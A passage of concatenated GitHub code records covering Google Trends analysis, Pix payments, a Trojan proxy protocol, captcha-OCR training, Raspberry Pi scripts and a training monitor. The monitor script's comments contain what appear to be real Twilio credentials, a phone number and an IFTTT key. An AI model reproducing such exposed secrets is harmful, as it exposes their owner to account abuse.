tz=360,timeout=(10,25),retries=10, backoff_factor=0.1)\n # self.data=pd.DataFrame()\n self.data = []\n self.data_reg = []\n \n \n def search(self,start,end):\n trends = TrendReq(hl=\"es-MX\", tz=360,timeout=(10,25),retries=10, backoff_factor=0.1)\n trends.build_payload(kw_list=[self.brand],cat=0,\n timeframe=\"{} {}\".format(start,end),\n geo=str('MX'))\n df_edo = trends.interest_by_region()\n df_edo = df_edo.rename(columns={self.brand:\"Vol_Trends\"})\n #self.datajson = df_edo.to_json(orient=\"index\", force_ascii=False)\n self.data = df_edo\n \n def save(self,output_path):\n with open(str(output_path),\"w\") as fp:\n json.dump(self.data,fp,indent=4)\n\n def regionalize(self):\n data_region = self.MascaraRegion(self.data)\n self.data_reg = data_region.groupby([\"Region\"]).agg(['mean'])\n\n def MascaraRegion(self,df):\n df = df.reset_index().rename(columns={\"geoName\":\"Estado\"})\n noroeste = [\"Baja California\", \"Baja California Sur\", \"Chihuahua\", \"Sinaloa\" ,\"Sonora\"]\n sureste = [ \"Campeche\", \"Chiapas\", \"Guerrero\",\"Oaxaca\", \"Quintana Roo\",\"Tabasco\", \"Veracruz\", \"Yucatán\"]\n occidente = [\"Aguascalientes\", \"Colima\", \"Guanajuato\", \"Jalisco\", \"Michoacán\", \"Nayarit\", \"Querétaro\", \"Zacatecas\"]\n noreste = [\"Coahuila de Zaragoza\", \"Durango\", \"Nuevo León\", \"San Luis Potosí\", \"Tamaulipas\"]\n #centro =[\"Tlaxcala\", \"Ciudad de México\", \"Estado de México\", \"Morelos\", \"Puebla\", \"Hidalgo\"]\n df[\"Region\"] = [\"Noroeste\" if i in noroeste else \"SurEste\" if i in sureste else \"Occidente\" if i in occidente else \"Noreste\" if i in noreste else \"Centro\" for i in df[\"Estado\"] ]\n return (df)\n\n\n \n \n \nejemplo = pytrendReg_tiempo(\"BBVA\")\nejemplo.search(\"2020-01-01\",\"2020-05-01\")\nejemplo.regionalize()\nejemplo.data_reg\nejemplo.save()\n\n\n\nsum=0\nregiones = config['variables']['vars']['agg_locs']['region']\nfor region in regiones.keys():\n for estado in regiones[region]:\n ej_data = json.loads(ejemplo.data)\n sum = sum + ej_data[estado][\"Vol_Trends\"]\n promedio = sum/len(regiones[region])\n data_region[region] = {\"Vol_Trend_avg\": promedio}\n\n\n\n\n\n\n\n\ntrends_tiempo = trends(\"BBVA\",\"2020-01-01\",\"2020-05-01\",config[\"variables\"][\"vars\"][\"agg_locs\"][\"estado\"],config[\"variables\"][\"vars\"][\"dict_estado_codigo\"])\ntrends_tiempo.search()\ntrends_tiempo.data\ntrends_tiempo.save(\"BBVAHackathon/Data/trends_tiempo.json\")\n\na.get_geo_code(config[\"variables\"][\"vars\"][\"dict_estado_codigo\"],\"Aguascalientes\")[3:]\nconfig[\"variables\"][\"vars\"][\"agg_locs\"].keys()\nconfig[\"variables\"][\"vars\"][\"dict_estado_codigo\"]\nfrom pytrends.request import TrendReq\nTrendReq()\nend = \"2020-05-01\"\ndt=datetime.strptime(end,\"%Y-%m-%d\")\ndt.date()","repo_name":"jcarvargtz/twitter_marcas_master","sub_path":"MASTERFILE/Utils/base_trends.py","file_name":"base_trends.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30135708666","text":"from setuptools import setup, find_packages\r\n\r\nwith open(\"README.md\", \"r\") as f:\r\n long_description = f.read()\r\n\r\nsetup(\r\n name=\"ecowater_softener\",\r\n version=\"1.0.0\",\r\n author=\"barleybobs\",\r\n description=\"A small package to pull data from Ecowater water softeners\",\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/barleybobs/ecowater-softener\",\r\n packages=find_packages(),\r\n classifiers=[\r\n \"Programming Language :: Python :: 3\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n ]\r\n)\r\n","repo_name":"barleybobs/ecowater-softener","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"12136991293","text":"#!/opt/miniconda3/bin/python\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nA = np.loadtxt(\"result_of_maxent/A.txt\")\nlambda_ = x = np.loadtxt(\"result_of_maxent/lambda.txt\") # 'lambda' is a reserved keyword in Python, so a trailing underscore was added to the variable name per the style guide\nx = np.loadtxt(\"result_of_maxent/x.txt\")\ny = np.loadtxt(\"result_of_maxent/y.txt\")\n\nwith open('index.txt', 'r') as f: index68 = int(f.read())\n\nxsolplot = x[:,index68]*100\n\nlow_limit = 1.5 # pick a low limit weight appropriate for your situation\na = 1\n\nx = np.arange(1, len(xsolplot) + 1)\ny = xsolplot\n\nfig = plt.figure()\n\nplt.plot(x, y)\n\nplt.title('Max Entropy Result', fontsize=15)\nplt.xlabel('Structure', fontsize=15)\nplt.ylabel('Weight (%)', fontsize=15)\n\nplt.ticklabel_format(useOffset=False)\n\nplt.tight_layout()\n\nplt.show()\n","repo_name":"ehb54/nmrsuite","sub_path":"work/maxent/Python/PlotResultsBeforeCluster.py","file_name":"PlotResultsBeforeCluster.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"15480739310","text":"import pynini\nfrom pynini.lib import pynutil\n\nfrom ukr.graph_utils import GraphFst, delete_space, NEMO_NOT_QUOTE\n\n\nclass CardinalFst(GraphFst):\n \"\"\"\n Finite state transducer for verbalizing cardinal\n e.g. cardinal { integer: \"23\" negative: \"-\" } -> -23\n \"\"\"\n\n def __init__(self):\n super().__init__(name=\"cardinal\", kind=\"verbalize\")\n\n # 'cardinal { negative: \"true\" integer: \"70\" }'\n optional_sign = pynini.closure(\n pynutil.delete(\"negative:\")\n + delete_space\n + pynutil.delete(\"\\\"\")\n + pynini.cross(\"true\", \"-\")\n + pynutil.delete(\"\\\"\")\n + delete_space,\n 0,\n 1,\n )\n graph = (\n pynutil.delete(\"integer:\")\n + delete_space\n + pynutil.delete(\"\\\"\")\n + pynini.closure(NEMO_NOT_QUOTE, 1)\n + pynutil.delete(\"\\\"\")\n )\n graph = optional_sign + graph\n self.numbers = graph\n\n delete_tokens = self.delete_tokens(graph)\n self.fst = delete_tokens.optimize()\n","repo_name":"lociko/ukraine_itn_wfst","sub_path":"ukr/verbalizers/cardinal.py","file_name":"cardinal.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"21225799297","text":"'''\n이 프로그램은 코로나 거리두기 2M 간격을 지키기 위해 만들어졌다.\n\n'''\n\n#모듈 임포트\nimport RPi.GPIO as GPIO\nimport time\n\n#PIN 초기화\nTRIGGER_PIN = 10\nECHO_PIN = 8\nSWITCH_PIN = 9\nBUZZER_PIN = 6\nLED_R_PIN = 18\nLED_G_PIN = 4\n\n#flag(on / off) 기능 변수\nflag = False\n\n#PIN 설정\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(TRIGGER_PIN,GPIO.OUT)\nGPIO.setup(ECHO_PIN,GPIO.IN)\nGPIO.setup(SWITCH_PIN,GPIO.IN,GPIO.PUD_UP) #풀업저항\nGPIO.setup(BUZZER_PIN,GPIO.OUT)\nGPIO.setup(LED_R_PIN,GPIO.OUT)\nGPIO.setup(LED_G_PIN,GPIO.OUT)\n\n#pwm 설정 / 음계 중 '도' 소리가 출력된다.\npwm = GPIO.PWM(BUZZER_PIN,262) \npwm.start(0)\n\ntry:\n #time 5초 간격 설정\n time_start=time.time()\n time_end=time_start+5\n\n while True:\n val = GPIO.input(SWITCH_PIN)\n if val == 0 and switch_status==0: #버튼을 눌러서 on으로 전환한다 / flag = True\n flag = not flag\n time.sleep(1) #버튼을 누르면 값이 계속 0이기 때문에 if문이 한번이 아니라 여러번 작동할 수 있다. 작동을 잠깐 멈추어서 반복하는 것을 막는다.\n \n elif val == 0 and switch_status==1: #버튼을 눌러서 off로 전환한다 / flag = False\n flag = not flag\n time.sleep(1) #버튼을 누르면 값이 계속 0이기 때문에 if문이 한번이 아니라 여러번 작동할 수 있다. 작동을 잠깐 멈추어서 반복하는 것을 막는다.\n \n GPIO.output(LED_G_PIN, GPIO.HIGH if flag else GPIO.LOW) #flag가 True라면 LED가 켜진다.\n \n #flag가 True일때만 실행한다\n if flag == False: continue\n else:\n #5초가 지났을 때 거리를 잰다.\n if time.time()>=time_end:\n #초음파 센서를 활용한 거리 측정\n GPIO.output(TRIGGER_PIN,True) #10us\n time.sleep(0.00001)\n GPIO.output(TRIGGER_PIN,False)\n while GPIO.input(ECHO_PIN) == 0: pass\n start = time.time()\n while GPIO.input(ECHO_PIN) == 1: pass\n stop = time.time()\n duration_time = stop -start \n distance = 17160 * duration_time\n\n #시간 5초 루프 초기화\n time_start=time.time()\n time_end=time_start+5\n \n if(distance < 200): #거리가 2M 이내라면\n #piezp_buzzer와 LED ON!\n pwm.ChangeDutyCycle(50)\n GPIO.output(LED_R_PIN,GPIO.HIGH)\n else:\n #piezp_buzzer와 LED OFF!\n pwm.ChangeDutyCycle(0)\n GPIO.output(LED_R_PIN,GPIO.LOW)\n time.sleep(0.1)\nfinally:\n GPIO.cleanup()\n","repo_name":"minsung521/2021_IOT_RaspberryPi","sub_path":"1320_오민용_final.py","file_name":"1320_오민용_final.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72597153194","text":"import winsound\nfrom tkinter import *\nfrom tkinter import filedialog\n\n\n\n\n\nclass App:\n\t\n\n\tdef __init__(self, master):\n\t\tfield_button_name = StringVar()\n\t\tfield_button_dir = StringVar()\n\n\t\tdict = {}\n\n\t\tframe_main = Frame(master)\n\t\tframe_main.grid(row = 0)\n\t\t\n\t\tframe_buttons = Frame(master)\n\t\tframe_buttons.grid(row = 1)\n\t\t\n\t\t\n\t\tlabel_name_entry = Label(frame_main, text = \"Button Name:\")\n\t\tlabel_name_entry.grid(row = 0, column = 0)\n\t\t\t\n\t\tbutton_find_song = Button(frame_main, text = \"Select Song\",command = lambda : sound_directory())\n\t\tbutton_find_song.grid(row = 1, column = 0)\t\n\t\t\t\n\t\tentry_name_button = Entry(frame_main, textvariable = field_button_name, width = 40) ##Field for files\n\t\tentry_name_button.grid(row = 0, column = 1)\n\t\t\t\n\t\tentry_dir_song = Entry(frame_main, textvariable = field_button_dir, width = 40)\n\t\tentry_dir_song.grid(row = 1, column = 1)\n\t\t\n\t\tbutton_make_button = Button(frame_main, text = \"Make Button\", command = lambda : make_new_button())\n\t\tbutton_make_button.grid(row = 0, rowspan =2, column = 2)\n\n\t\tdef sound_directory():\n\t\t\tdirName = filedialog.askopenfilename()\n\t\t\tif dirName:\n\t\t\t\tfield_button_dir.set(dirName)\n\t\t\t\t\n\t\tdef make_new_button():\n\t\t\tbutton_new_made = Button(frame_buttons, text = field_button_name.get(), command = lambda : play_sound(dict [field_button_name.get()]))\n\t\t\tbutton_new_made.pack()\n\t\t\tdict [field_button_name.get()] = field_button_dir.get()\n\t\t\tdict [field_button_name.get()]\n\t\t\n\t\tdef play_sound(sound_name):\n\t\t\twinsound.PlaySound(sound_name, winsound.SND_FILENAME)\n\t\t\t\n\t\n\t\t\t\nroot = Tk()\n\napp = App(root)\n\n\nroot.mainloop()\n\n\n","repo_name":"Igotabiggit/Soundboard","sub_path":"Buttons.py","file_name":"Buttons.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15239753057","text":"import requests\nimport base64\nimport json\nimport string\nimport random\n\nfrom gerencianet import Gerencianet\nfrom django.conf import settings\nfrom client.register.models import Clients\n\ndef get_token_api_payment():\n credentials = {\n \"client_id\": settings.DEV_CLIENT_KEY,\n \"client_secret\": settings.DEV_SECRET_KEY,\n}\n\n certificado = f'client/payment_api/certificates/{settings.CERT_DEV}' # A variável certificado é o diretório em que seu certificado em formato .pem deve ser inserido\n \n auth = base64.b64encode(\n (f\"{credentials['client_id']}:{credentials['client_secret']}\"\n ).encode()).decode()\n\n url = \"https://api-pix-h.gerencianet.com.br/oauth/token\" #Para ambiente de Desenvolvimento\n\n payload=\"{\\r\\n \\\"grant_type\\\": \\\"client_credentials\\\"\\r\\n}\"\n headers = {\n 'Authorization': f\"Basic {auth}\",\n 'Content-Type': 'application/json'\n }\n\n response = requests.request(\"POST\",\n url,\n headers=headers,\n data=payload,\n cert=certificado)\n access = response.json()\n\n return access['access_token']\n\ndef _headers():\n heraders = {\n 'Authorization': f'Bearer {get_token_api_payment()}',\n 'Content-Type': 'application/json'\n }\n return heraders\n\ndef generate_key_pix():\n print('Gerando chave...')\n\n certificado = f'{settings.PATH_CREDENTIALS}{settings.CERT_DEV}'\n\n url = \"https://api-pix-h.gerencianet.com.br/v2/gn/evp\"\n\n payload={}\n headers = {\n 'authorization': f'Bearer {get_token_api_payment()}',\n #'Content-Type': 'application/json'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, cert=certificado)\n print(response)\n\n return response.json()\n\ndef txid_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\ndef pix_payment(client_id, shopping_cart, total, name_information=\"Campo adicional\", additional_information=\"Informação adicional\"):\n clients = Clients.objects.filter(pk=client_id)\n client = [info.to_json() for info in clients]\n\n headers = _headers()\n certificado = f'client/payment_api/certificates/{settings.CERT_DEV}'\n\n url = f'{settings.GN_BASE_URL}/v2/cob'\n payload = json.dumps({\n \"calendario\": {\n \"expiracao\": 3600\n },\n \"devedor\": {\n \"cpf\": client[0]['cpf'],\n \"nome\": client[0]['name']\n },\n \"valor\": {\n \"original\": str(total)\n },\n \"chave\": \"e63a6451-ec39-450a-aaac-6310baaa25e7\",\n \"solicitacaoPagador\": \"Informe o número ou identificador do pedido.\"\n })\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, cert=certificado)\n \n #save_pix(response.json(), request.user.pk, company)\n\n return response.json()\n\ndef generate_qr_code(loc_id):\n\n headers = _headers()\n certificate = f'{settings.PATH_CREDENTIALS}{settings.CERT_DEV}'\n\n if loc_id:\n url = url = f\"{settings.GN_BASE_URL}/v2/loc/{loc_id}/qrcode\"\n else:\n return 'Informe o id de localização da cobrança'\n\n response = requests.request(\"GET\", url, headers=headers, data={}, cert=certificate)\n qrcode = response.json()\n\n return qrcode['imagemQrcode']\n\ndef pix_revision(txid):\n\n headers = _headers()\n certificado = f'{settings.PATH_CREDENTIALS}{settings.CERT_DEV}'\n\n if txid:\n url = f'{settings.GN_BASE_URL}/v2/cob/{txid}'\n else:\n return 'Informe o localizador da cobrança'\n\n payload = json.dumps({\n \"calendario\": {\n \"expiracao\": 600\n },\n \"devedor\": {\n \"nome\": \"Fukuma\",\n \"cpf\": \"70921227086\"\n },\n \"valor\": {\n \"original\": \"3000.00\"\n },\n \"chave\": \"03659197050\",\n \"solicitacaoPagador\": \"Informe o número ou identificador do pedido.\",\n \"infoAdicionais\": [\n {\n \"nome\": \"Campo 1\",\n \"valor\": \"valor 1\"\n }\n ]\n })\n\n response = requests.request(\"PATCH\", url, headers=headers, data=payload, cert=certificado)\n\n return response","repo_name":"Daniflav94/E-commerce","sub_path":"Backend/services/client/client/payment_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14751719902","text":"\"\"\"Trojan protocol implementation.\n\nLinks:\n https://trojan-gfw.github.io/trojan/protocol\n\"\"\"\nfrom dataclasses import dataclass\nfrom functools import cached_property\nfrom hashlib import sha224\n\nfrom typing_extensions import Self\n\nfrom p3.common.tcp import TCPConnector\nfrom p3.contrib.basic.socks5 import Socks5Addr, Socks5Atyp, Socks5Cmd\nfrom p3.iobox import TLSCtxInbox, TLSCtxOutbox\nfrom p3.stream import (Acceptor, ProxyAcceptor, ProxyConnector, ProxyRequest,\n Stream)\nfrom p3.stream.errors import ProtocolError\nfrom p3.utils.override import override\n\n\n@dataclass\nclass TrojanRequest:\n \"\"\"\n +-----+------+----------+----------+\n | CMD | ATYP | DST.ADDR | DST.PORT |\n +-----+------+----------+----------+\n | 1 | 1 | Variable | 2 |\n +-----+------+----------+----------+\n \"\"\"\n cmd: Socks5Cmd\n dst: Socks5Addr\n\n def __bytes__(self) -> bytes:\n return bytes(self.cmd) + bytes(self.dst)\n\n @classmethod\n async def read_from_stream(cls, stream: Stream) -> Self:\n cmd = await Socks5Cmd.read_from_stream(stream)\n dst = await Socks5Addr.read_from_stream(stream)\n return cls(cmd, dst)\n\n\n@dataclass\nclass TrojanHeader:\n \"\"\"\n +-----------------------+---------+----------------+---------+----------+\n | hex(SHA224(password)) | CRLF | Trojan Request | CRLF | Payload |\n +-----------------------+---------+----------------+---------+----------+\n | 56 | X'0D0A' | Variable | X'0D0A' | Variable |\n +-----------------------+---------+----------------+---------+----------+\n \"\"\"\n auth: bytes\n req: TrojanRequest\n\n def __bytes__(self) -> bytes:\n return self.auth + b'\\r\\n' + bytes(self.req) + b'\\r\\n'\n\n @classmethod\n async def read_from_stream(cls, stream: Stream) -> Self:\n auth = await stream.readuntil(b'\\r\\n', strip=True)\n if len(auth) != 56:\n raise ProtocolError('trojan', 'crlf')\n req = await TrojanRequest.read_from_stream(stream)\n empty = await stream.readuntil(b'\\r\\n', strip=True)\n if len(empty) != 0:\n raise ProtocolError('trojan', 'crlf')\n return cls(auth, req)\n\n\nclass TrojanConnector(ProxyConnector):\n auth: bytes\n\n ensure_next_layer = True\n\n def __init__(self, auth: bytes, **kwargs):\n super().__init__(**kwargs)\n assert len(auth) == 56\n self.auth = auth\n\n @override(ProxyConnector)\n async def connect(self, rest: bytes = b'') -> Stream:\n assert self.next_layer is not None\n dst = Socks5Addr(Socks5Atyp.DOMAINNAME, self.addr)\n treq = TrojanRequest(Socks5Cmd.Connect, dst)\n req = bytes(TrojanHeader(self.auth, treq))\n if len(rest) != 0:\n req += rest\n return await self.next_layer.connect(rest=req)\n\n\nclass TrojanAcceptor(ProxyAcceptor):\n auth: bytes\n\n ensure_next_layer = True\n\n def __init__(self, auth: bytes, **kwargs):\n super().__init__(**kwargs)\n assert len(auth) == 56\n self.auth = auth\n\n @override(ProxyAcceptor)\n async def accept(self) -> Stream:\n assert self.next_layer is not None\n stream = await self.next_layer.accept()\n async with stream.cm(exc_only=True):\n header = await TrojanHeader.read_from_stream(stream)\n auth, req = header.auth, header.req\n if auth != self.auth:\n raise ProtocolError('trojan', 'auth')\n Socks5Cmd.Connect.ensure(req.cmd)\n return stream\n\n\nclass TrojanInbox(TLSCtxInbox):\n scheme = 'trojan'\n\n @cached_property\n def auth(self) -> bytes:\n return sha224(self.url.pwd.encode()).hexdigest().encode()\n\n @override(TLSCtxInbox)\n async def accept_primitive(\n self,\n next_acceptor: Acceptor,\n ) -> tuple[Stream, ProxyRequest]:\n acceptor = TrojanAcceptor(auth=self.auth, next_layer=next_acceptor)\n return await ProxyRequest.from_acceptor(acceptor=acceptor)\n\n\nclass TrojanOutbox(TLSCtxOutbox):\n scheme = 'trojan'\n\n @cached_property\n def auth(self) -> bytes:\n return sha224(self.url.pwd.encode()).hexdigest().encode()\n\n @override(TLSCtxOutbox)\n async def connect(self, req: ProxyRequest) -> Stream:\n next_connector = TCPConnector(\n tcp_extra_kwargs=self.tcp_extra_kwargs,\n addr=self.url.addr,\n )\n connector = TrojanConnector(\n auth=self.auth,\n addr=req.addr,\n next_layer=next_connector,\n )\n return await connector.connect(rest=req.rest)\n","repo_name":"vhqr0/python-proxy-platform","sub_path":"p3/contrib/basic/trojan.py","file_name":"trojan.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14751808672","text":"from collections.abc import Callable\nfrom struct import Struct\nfrom typing import Any\n\nfrom p3.stream.buffer import Buffer\nfrom p3.stream.stream import Stream\n\n\nclass BaseStruct(Struct):\n\n def pack_varlen(self, buf: bytes) -> bytes:\n return self.pack(len(buf)) + buf\n\n def unpack_with_types(\n self,\n buf: bytes,\n *ts: Callable[[Any], Any],\n ) -> tuple[Any, ...]:\n vs = self.unpack(buf)\n return tuple(t(v) for t, v in zip(ts, vs))\n\n async def read_from_stream(self, stream: Stream) -> tuple[Any, ...]:\n buf = await stream.readexactly(self.size)\n return self.unpack(buf)\n\n async def read_from_stream_with_types(\n self,\n stream: Stream,\n *ts: Callable[[Any], Any],\n ) -> tuple[Any, ...]:\n buf = await stream.readexactly(self.size)\n return self.unpack_with_types(buf, *ts)\n\n async def read_varlen_from_stream(self, stream: Stream) -> bytes:\n blen, = await self.read_from_stream(stream)\n return await stream.readexactly(blen)\n\n def pop_from_buffer(self, buffer: Buffer) -> tuple[Any, ...]:\n buf = buffer.pop(self.size)\n return self.unpack(buf)\n\n def pop_from_buffer_with_types(\n self,\n buffer: Buffer,\n *ts: Callable[[Any], Any],\n ) -> tuple[Any, ...]:\n buf = buffer.pop(self.size)\n return self.unpack_with_types(buf, *ts)\n\n def pop_varlen_from_buffer(self, buffer: Buffer) -> bytes:\n blen, = self.pop_from_buffer(buffer)\n return buffer.pop(blen)\n\n\nBStruct = BaseStruct('!B')\nHStruct = BaseStruct('!H')\nIStruct = BaseStruct('!I')\nQStruct = BaseStruct('!Q')\n","repo_name":"vhqr0/python-proxy-platform","sub_path":"p3/stream/structs.py","file_name":"structs.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19461186111","text":"from crnn import *\n\n\n# config\nclass Config:\n # data\n train_data_path = Path('data/images')\n # train_data_path = Path('data/kaggle_data/samples')\n test_data_path = Path('data/test_images')\n model_dir = Path('models')\n\n # model architecture\n in_channels = 3\n rnn_hidden_size = 256\n leaky_relu = False\n\n # training\n n_epochs = 5\n lr = 1e-3\n bs = 64\n model_name = 'ocr_crnn_captcha'\n\n\ndef get_ds(items):\n item_tfms = [PILImage.create, ]\n y_tfms = [label_func, CategorizeList(add_na=False), ]\n\n ds = Datasets(\n items=items,\n tfms=[\n item_tfms,\n y_tfms,\n ],\n splits=RandomSplitter(valid_pct=0.2, seed=42)(items),\n )\n return ds\n\n\ndef get_dls(ds, bs=64):\n dls = ds.dataloaders(\n bs=bs,\n before_batch=BeforeBatchTransform(keep_ratio=True),\n create_batch=CreateBatchTransform(),\n after_batch=[IntToFloatTensor, Normalize.from_stats([0.5] * 3, [0.5] * 3)],\n )\n return dls\n\n\ndef train(config):\n # load data\n f_names = get_image_files(config.train_data_path)\n ds = get_ds(items=f_names)\n dls = get_dls(ds, bs=config.bs)\n\n # create model\n model = CRNN(\n in_channels=config.in_channels,\n rnn_hidden_size=config.rnn_hidden_size,\n n_classes=ds.tfms[1][-1].n_classes,\n leaky_relu=config.leaky_relu,\n )\n loss_func = CTCLoss(blank=ds.tfms[1][-1].blank_idx)\n metrics = [AccMetric()]\n\n # create learner\n learner = Learner(\n dls=dls,\n model=model,\n loss_func=loss_func,\n metrics=metrics,\n )\n\n # fit one cycle\n learner.fit_one_cycle(config.n_epochs, lr=config.lr)\n\n learner.model_dir = config.model_dir\n learner.save(config.model_name)\n\n learner.export(config.model_dir / f'{config.model_name}.pkl')\n\n\ndef evaluate(config):\n # load learner\n learner = load_learner(config.model_dir / f'{config.model_name}.pkl')\n\n # create test_dl\n test_files = get_image_files(config.test_data_path)\n test_dl = learner.dls.test_dl(test_files, with_labels=True)\n\n # validate test_dl\n test_loss, test_acc = learner.validate(dl=test_dl)\n print(f'test_loss = {test_loss}, test_acc = {test_acc}')\n\n\nif __name__ == '__main__':\n config = Config()\n print('-' * 10, 'Training', '-' * 10)\n train(config)\n\n print('-' * 30)\n\n print('-' * 10, 'Test', '-' * 10)\n evaluate(config)\n","repo_name":"thanhlt998/ocr_captcha_crnn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"31381738182","text":"import psutil\nimport sys, getopt\nfrom SendSMS import sendSMS\nimport time\nimport signal\nimport os\nimport subprocess\n\n# #use twilio SMS to notify auto-termination\n# from twilio.rest import Client\n# # Your Account SID from twilio.com/console\n# account_sid = \"ACd910fbbc47da001bd0fedcb5244cde07\"\n# # Your Auth Token from twilio.com/console\n# auth_token = \"c0c0d3a6a1340e70aa1e89d9808adc9f\"\n# client = Client(account_sid, auth_token)\n# message = client.messages.create(\n# # 这里中国的号码前面需要加86\n# to=\"+8613809008267\", \n# from_=\"+14356592468\",\n# body=\"This is a notification message for program termination\")\n# print(message.sid)\n\n# #use IFTTT to send notification\n# import requests\n \n# def send_notice(event_name, key, text):\n# url = \"https://maker.ifttt.com/trigger/\"+event_name+\"/with/key/\"+key+\"\"\n# payload = \"{\\\"value1\\\": \\\"\"+text+\"\\\"}\"\n# headers = {\n# 'Content-Type': \"application/json\",\n# 'User-Agent': \"PostmanRuntime/7.15.0\",\n# 'Accept': \"*/*\",\n# 'Cache-Control': \"no-cache\",\n# 'Postman-Token': \"a9477d0f-08ee-4960-b6f8-9fd85dc0d5cc,d376ec80-54e1-450a-8215-952ea91b01dd\",\n# 'Host': \"maker.ifttt.com\",\n# 'accept-encoding': \"gzip, deflate\",\n# 'content-length': \"63\",\n# 'Connection': \"keep-alive\",\n# 'cache-control': \"no-cache\"\n# }\n \n# response = requests.request(\"POST\", url, data=payload.encode('utf-8'), headers=headers)\n \n# print(response.text)\n \n# text = \"Training complete!\"\n# send_notice('notify_phone', 'ciupL2jYLeb8biRCYTfUnr', text)\n\ndef terminate_acme():\n PROCNAME=\"acmeIngress_mp.py\"\n sig=signal.SIGTERM\n for proc in psutil.process_iter():\n for cmd in proc.cmdline():\n if PROCNAME in cmd :\n #print(proc.cmdline())\n #proc.kill()\n os.kill(proc.pid,sig)\n break\nif __name__=='__main__':\n #args=sys.argv\n #token=args[1]\n token=\"acmeSessionID\"\n cktToken=\"checkoutpointToken\"\n length=10\n totalReward=0.0\n avgReward=0.0\n NLoops=0\n RewardThreshold=70000\n NLoopsThreshold=10000\n \n opts,args=getopt.getopt(sys.argv[1:],\"ht:l:r:n:c:\")\n for opt,arg in opts:\n if opt==\"-h\":\n print ('monitory.py \\n-t \\n-l \\\n \\n-r \\n-n ')\n sys.exit()\n elif opt==\"-t\":\n token=arg\n elif opt==\"-c\":\n cktToken=arg\n elif opt==\"-l\":\n length=int(arg)\n elif opt==\"-r\":\n RewardThreshold=int(arg)\n elif opt==\"-n\":\n NLoopsThreshold=int(arg)\n filename = \"/home/templarares/acme/\"+token+\"/logs/evaluator/logs.csv\"\n filename2=\"/home/templarares/devel/src/bit-car-inout-controller/etc/NLoops.yaml\"\n cktDir=\"/home/templarares/acme/\"+cktToken+\"/checkpoints/d4pg_learner\"\n while True:\n with open(filename, 'rb') as fp:\n line_offset=0\n offset=-60*(length+line_offset)\n fp.seek(offset,2)\n lines=fp.readlines()\n #calculate reward for the latest 10 runs\n \n for i in range(line_offset+1,line_offset+length+1):\n line=lines[-i].decode()\n #print(line)\n fst=line.index(\",\")\n #print(\"first is %d\"%fst)\n snd=line.index(\",\",fst+1)\n #print(\"second is %d\"%snd)\n reward=float(line[fst+1:snd])\n \n #second version, with two more commas\n trd=line.index(\",\",snd+1)\n fth=line.index(\",\",trd+1)\n reward=float(line[trd+1:fth])\n #print(reward)\n totalReward+=reward\n avgReward=totalReward/length\n print(avgReward)\n fp.close()\n with open(filename2, 'r') as fp:\n first_line=fp.readline().strip('\\n')\n comma=first_line.find(\":\")\n if comma>0:\n NLoops=int(first_line[comma+2:])\n else:\n NLoops=1\n print(\"NLoops= %d\"%NLoops)\n fp.close()\n if avgReward>RewardThreshold and NLoops>NLoopsThreshold:\n #make snapshots of the checkpoint several times, wait for the optimal networks to be saved locally\n #time.sleep(60)\n p=subprocess.Popen(['git','init'],cwd=cktDir)\n p.wait()\n p.kill()\n for i in range(42):\n p=subprocess.Popen(['git','add','.'],cwd=cktDir)\n p.wait()\n p.kill()\n commitMsg='\\\"snapshot%d\\\"'%i\n p=subprocess.Popen(['git','commit','-m',commitMsg],cwd=cktDir)\n p.wait()\n p.kill()\n time.sleep(35)\n \n sendSMS()\n terminate_acme()\n sys.exit(\"Training completion criteria met!\")\n totalReward=0\n time.sleep(42)","repo_name":"templarares/acme_ingress","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14278753341","text":"from machine import Pin\r\n\r\n#default pins for your Raspberry Pi Pico/PicoW\r\nlatchPin = 7 #RCLK\r\nclockPin = 6 #SRCLK\r\ndataPin = 8 #SER\r\n\r\n# The shift register is a 74HC595\r\n# This shiftregister class helps reduce the number of pins needed by the microcontroller\r\n# This class also supports daisy chaining shift registers\r\n# To use this class, you need to connect the shift register to your microcontroller\r\n# The shift register is connected to the microcontroller as follows:\r\n# latchPin = 7 (RCLK pin 12 on 74HC595)\r\n# clockPin = 6 (SRCLK pin 11 on 74HC595)\r\n# dataPin = 8 (SER pin 14 on 74HC595)\r\n# First, set the register size\r\n# Next, set the register property in the class as an array, for example if the size is 8, then the register is [0,0,0,0,0,0,0,0]\r\n# Then call the set_register() method to set the register\r\n# To change the register, change the register property then call the set_register() method 